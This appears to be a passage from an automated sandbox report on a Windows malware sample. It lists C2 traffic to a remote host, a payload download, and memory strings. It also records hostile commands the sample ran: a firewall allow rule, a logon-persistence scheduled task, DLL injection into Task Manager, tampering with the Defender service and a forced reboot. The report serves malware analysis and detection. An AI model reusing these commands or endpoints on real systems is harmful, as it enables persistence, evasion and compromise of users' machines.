          Source: jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmp String found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444address already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memoryconfig must not be nilcouldn't create devicecouldn't get file infocouldn't register testcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codewirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type ) must be a power of 2
          Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Date: Mon, 18 Oct 2021 06:02:35 GMT Content-Type: application/octet-stream Content-Length: 2102272 Connection: keep-alive content-disposition: attachment; filename=watchdog.exe etag: "61680a87-201400" last-modified: Thu, 14 Oct 2021 10:46:31 GMT Cache-Control: max-age=3600 CF-Cache-Status: HIT Age: 125 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SIEIN%2F1XF0Uz1zUWhWjjtVKcK6yr2rylxw1%2B9wHdhNwCZmlQnik1Y11rhtQkNHt8%2F06zowdGfNcUGMzVlV7%2BzZVdUTz7EvckfqyHt3WHegA8D9QEHcXnQQxKcd0I"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 69ff8f0268394357-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELK p-M-M@MMUPX0p-UPX1 - @UPX2M
          Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1 Host: server1.trumops.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15 Content-Length: 640 Accept-Encoding: gzip
          Source: global traffic HTTP traffic detected: POST /api/poll HTTP/1.1 Host: server1.trumops.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 Content-Length: 660 Accept-Encoding: gzip
          Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 18 Oct 2021 06:02:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6e7jhhRmMzOf4z%2FUVKvoyuNsNr6MSHqph18xAkrV9pOs%2B%2Boq4%2BF2jzazvCMxyCBU2NQlVPEvKVhjhPqX1uOZ%2FoiylBBXdSh2%2FXzdzssuJjAhBpX72Lj2UL1Oon0%2B49gNCRBVJEbz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69ff8d5c680642ee-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 18 Oct 2021 06:02:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=msr8acg9pq7sp3dcop8c04029e; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MgqHad%2BRL1Jwi19koLru3c3g79m4yhxIQIen93O1%2FIzAOqJAqXouucy1HssWOW9a2T8dJbYXCbBqiBBas6ee%2FLto73zfabvgBZk3r04GcxpJybUfENx4vZPL%2BJKObmAFzN6d9qUJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69ff8d80de494e32-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 18 Oct 2021 06:03:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/8.0.11 set-cookie: PHPSESSID=c736gp74eq681lbg8qrkf25c2s; path=/; HttpOnly expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-credentials: false CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjJp%2FH0fSWWxfTYWA7zwRjoI7bZtPkocfoGHJ4e5RX%2F3mAoDoWRTLYBA3mWnjETR%2BBkl%2FDm6Z0fAvwUS%2BQfOW4pgeSWwqn4UzdBrsoE6VxOMsXgBWzJHovfUijYMuRV4nPXXU1Rs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69ff8f3c3c80701c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Source: unknown HTTP traffic detected: POST /bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1 Host: server1.trumops.com User-Agent: Go-http-client/1.1 Content-Length: 19043 Content-Type: application/json; charset=UTF-8 Accept-Encoding: gzip
          Source: unknown DNS traffic detected: queries for: trumops.com
          Source: global traffic HTTP traffic detected: GET /api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 HTTP/1.1 Host: server1.trumops.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
          Source: global traffic HTTP traffic detected: GET /370c4779d730135afa0e64399be9936c/watchdog.exe HTTP/1.1 Host: gohnot.com User-Agent: Go-http-client/1.1 Uuid: 8db1a514-f568-41bf-af6a-dffb7cea0346 Version: 183 Accept-Encoding: gzip

          System Summary:

          Uses shutdown.exe to shutdown or reboot the system
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: jkDmft1Qoe.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
          Source: 34.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 4.0.jkDmft1Qoe.exe.9af360.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 34.2.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 32.2.csrss.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.2.jkDmft1Qoe.exe.9a7760.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 28.0.csrss.exe.9a7760.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0.0.jkDmft1Qoe.exe.9af360.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_ME_RawDisk_Agent_Jan20_2 date = 2020-01-02, hash1 = 44100c73c6e2529c591a10cd3668691d92dc0241152ec82a72c6e63da299d3a2, author = Florian Roth, description = Detects suspicious malware using ElRawDisk, reference = https://twitter.com/jfslowik/status/1212501454549741568?s=09
          Source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe File created: C:\Windows\rss
          Source: EfiGuardDxe.efi.10.dr Static PE information: No import functions for PE file found
          Source: bootx64.efi.10.dr Static PE information: No import functions for PE file found
          Source: bootmgfw.efi.10.dr Static PE information: No import functions for PE file found
          Source: jkDmft1Qoe.exe, 00000000.00000000.657772523.00000000009FB000.00000008.00020000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.668856780.0000000000C57000.00000008.00020000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameHamakaze.exe( vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameWinmonFS.sysZ vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.678629448.00000000009FB000.00000008.00020000.sdmp Binary or memory string: OriginalFilenamedsefix.exe. vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp Binary or memory string: OriginalFilenameDBGHELP.DLLj% vs jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe, 00000004.00000000.665347802.0000000000C57000.00000008.00020000.sdmp Binary or memory string: OriginalFilenamesymsrv.dllj% vs jkDmft1Qoe.exe
          Source: C:\Windows\SysWOW64\sc.exe Process token adjusted: Security
          Source: jkDmft1Qoe.exe Virustotal: Detection: 57%
          Source: jkDmft1Qoe.exe Metadefender: Detection: 34%
          Source: jkDmft1Qoe.exe ReversingLabs: Detection: 46%
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe File read: C:\Users\user\Desktop\jkDmft1Qoe.exe
          Source: jkDmft1Qoe.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\jkDmft1Qoe.exe 'C:\Users\user\Desktop\jkDmft1Qoe.exe'
          Source: unknown Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Users\user\Desktop\jkDmft1Qoe.exe C:\Users\user\Desktop\jkDmft1Qoe.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR 'C:\Windows\rss\csrss.exe' /TN csrss /F
          Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn ScheduledUpdate /f
          Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\SysWOW64\mountvol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown Process created: C:\Windows\rss\csrss.exe 'C:\Windows\rss\csrss.exe'
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
          Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
          Source: C:\Windows\windefender.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: unknown Process created: C:\Windows\windefender.exe C:\Windows\windefender.exe
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'silentdust.exe'
          Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exe File created: C:\Users\user\AppData\Local\Temp\csrss
          Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@48/13@12/3
          Source: csrss.exe, 0000000A.00000003.825604620.00000000118F8000.00000004.00000001.sdmpBinary or memory string: SELECT Caption FROM Win32_OperatingSystemMicrosoft Windows 10 ProHKEY_USERS\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\TestAppHKEY_USERS\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\780aa3f8Microsoft Windows 10 ProDNS name does not exist.SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0000-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0000-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-002A-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-0116-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-0116-0409-1000-0000000FF1CE}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{929FBD26-9020-399B-9A7A-751D61F0B942}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{929FBD26-9020-399B-9A7A-751D61F0B942}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DA5E371C-6333-
3D8A-93A4-6FD5B20BCC6E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{050d4fc8-5d48-4b8f-8972-47c82c46020f}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{196BB40D-1578-3D01-B289-BEFC77A11A1E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{196BB40D-1578-3D01-B289-BEFC77A11A1E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19F7E289-17B8-44EC-A099-927507B6F739}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19F7E289-17B8-44EC-A099-927507B6F739}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{213668DB-2263-4E2D-ABB8-487FD539130E}SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{213668DB-2263-4E2D-ABB8-487FD539130E}SOFTWARE\Microsoft
          Source: jkDmft1Qoe.exe, 00000004.00000002.680804308.0000000011890000.00000004.00000001.sdmp Binary or memory string: SELECT Name FROM Win32_Process WHERE Name = 'silentdust.exe'"C:\Windows\rss\csrss.exe"1935-2125563209-4053062332-1002\Software\Microsoft\Windows\CurrentVersion\Runrogram="C:\Windows\rss\csrss.exe" enable=yes"APPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCAPPDATA=C:\Windows\system32\config\systemprofile\AppData\RoamingPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF6148827F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,35_2_00007FF6148827F0
          Source: C:\Windows\rss\csrss.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1900:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5692:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
          Source: C:\Windows\rss\csrss.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
